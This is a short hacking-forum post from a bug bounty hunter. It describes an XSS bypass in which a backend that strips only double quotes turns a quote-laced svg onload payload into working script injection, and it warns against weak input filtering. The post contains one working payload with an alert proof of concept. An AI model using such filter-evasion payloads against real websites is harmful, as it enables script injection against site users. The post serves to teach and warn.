Found an XSS bypass during a bug bounty

by x32x01 || Today at 09:50

Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<svg onload=alert()>

Never Rely on Poor Input Filtering !

Related Threads

XSS isn't dead - your website just thinks it is

x32x01
Jul 22, 2025

Replies: 0

Views: 112

Jul 22, 2025

x32x01

HTTP Status Codes and Methods

x32x01
Jan 12, 2024

Replies: 0

Views: 725

Jan 12, 2024

x32x01

What Sets RustScan Apart ?

x32x01
Apr 23, 2024

Replies: 0

Views: 763

Apr 23, 2024

x32x01

Google's XSS-Game Solutions

x32x01
Jan 12, 2024

Replies: 0

Views: 827

Jan 12, 2024

x32x01

A Detailed Guide on RustScan

x32x01
Jun 30, 2024

Replies: 0

Views: 766

Jun 30, 2024

x32x01

Mass Scan Cheat-Sheet

x32x01
Jan 12, 2024

Replies: 0

Views: 679

Jan 12, 2024

x32x01

Bypass File Upload Restrictions on WebApps to Pop Shell

x32x01
Jan 12, 2024

Replies: 0

Views: 866

Jan 12, 2024

x32x01

Log4jshell Vulnerability: What You Need to Know

x32x01
Jan 12, 2024

Replies: 0

Views: 714

Jan 12, 2024

x32x01

Bug Bounty Tips: Sensitive Data Exposure

x32x01
Jan 12, 2024

Replies: 0

Views: 635

Jan 12, 2024

x32x01

Ways To Find Host Header Injection Vulnerability

x32x01
Jan 12, 2024

Replies: 0

Views: 706

Jan 12, 2024

x32x01

Register & Login Faster

Latest Posts

Python script to find websites vulnerable to SQL inject
- Latest: x32x01
- Today at 14:45
WebSite & Server Hacking Forum
IDS vs IPS - What’s the Difference ?
- Latest: x32x01
- Today at 10:02
General PC Hacking Forum
What is Hash Cracking - Explained
- Latest: x32x01
- Today at 09:57
Encryption & Decryption Forum
Found an XSS bypass during a bug bounty
- Latest: x32x01
- Today at 09:50
WebSite & Server Hacking Forum
macOS Viruses - Myth vs Reality
- Latest: x32x01
- Today at 09:40
Apple Mac OS Forum
AI Phishing - The New Era of Cyber Attacks and defence
- Latest: x32x01
- Yesterday at 11:48
General PC Hacking Forum
Hackers’ Favorite Symbols You Should Know!
- Latest: x32x01
- Yesterday at 11:45
General PC Hacking Forum
AI Automation Pentesting Tools - Power & Defense
- Latest: x32x01
- Yesterday at 11:07
General PC Hacking Forum
Linux vs. Windows File System - Explained
- Latest: x32x01
- Wednesday at 11:25
Information Technology Forum
Microsoft Windows 11 Pro 25H2 x64 bit
- Latest: x32x01
- Tuesday at 11:33
Download TabCode Resources

Latest Resources

Microsoft Windows 11 Pro 25H2 x64 bit
- x32x01
- Updated: Tuesday at 11:33
Download Vulnerable Windows 7 VM
- x32x01
- Updated: Sunday at 10:57
Microsoft Windows 10 Edition 22H2 x64 bit
- x32x01
- Updated: Jul 30, 2024
Active Directory Security Guide
- x32x01
- Updated: Mar 8, 2024
191 Security Analyst Interview Questions
- x32x01
- Updated: Mar 8, 2024

Forum Statistics

Threads: 611

Messages: 616

Members: 63

Latest Member: Marcan-447-

Back

Top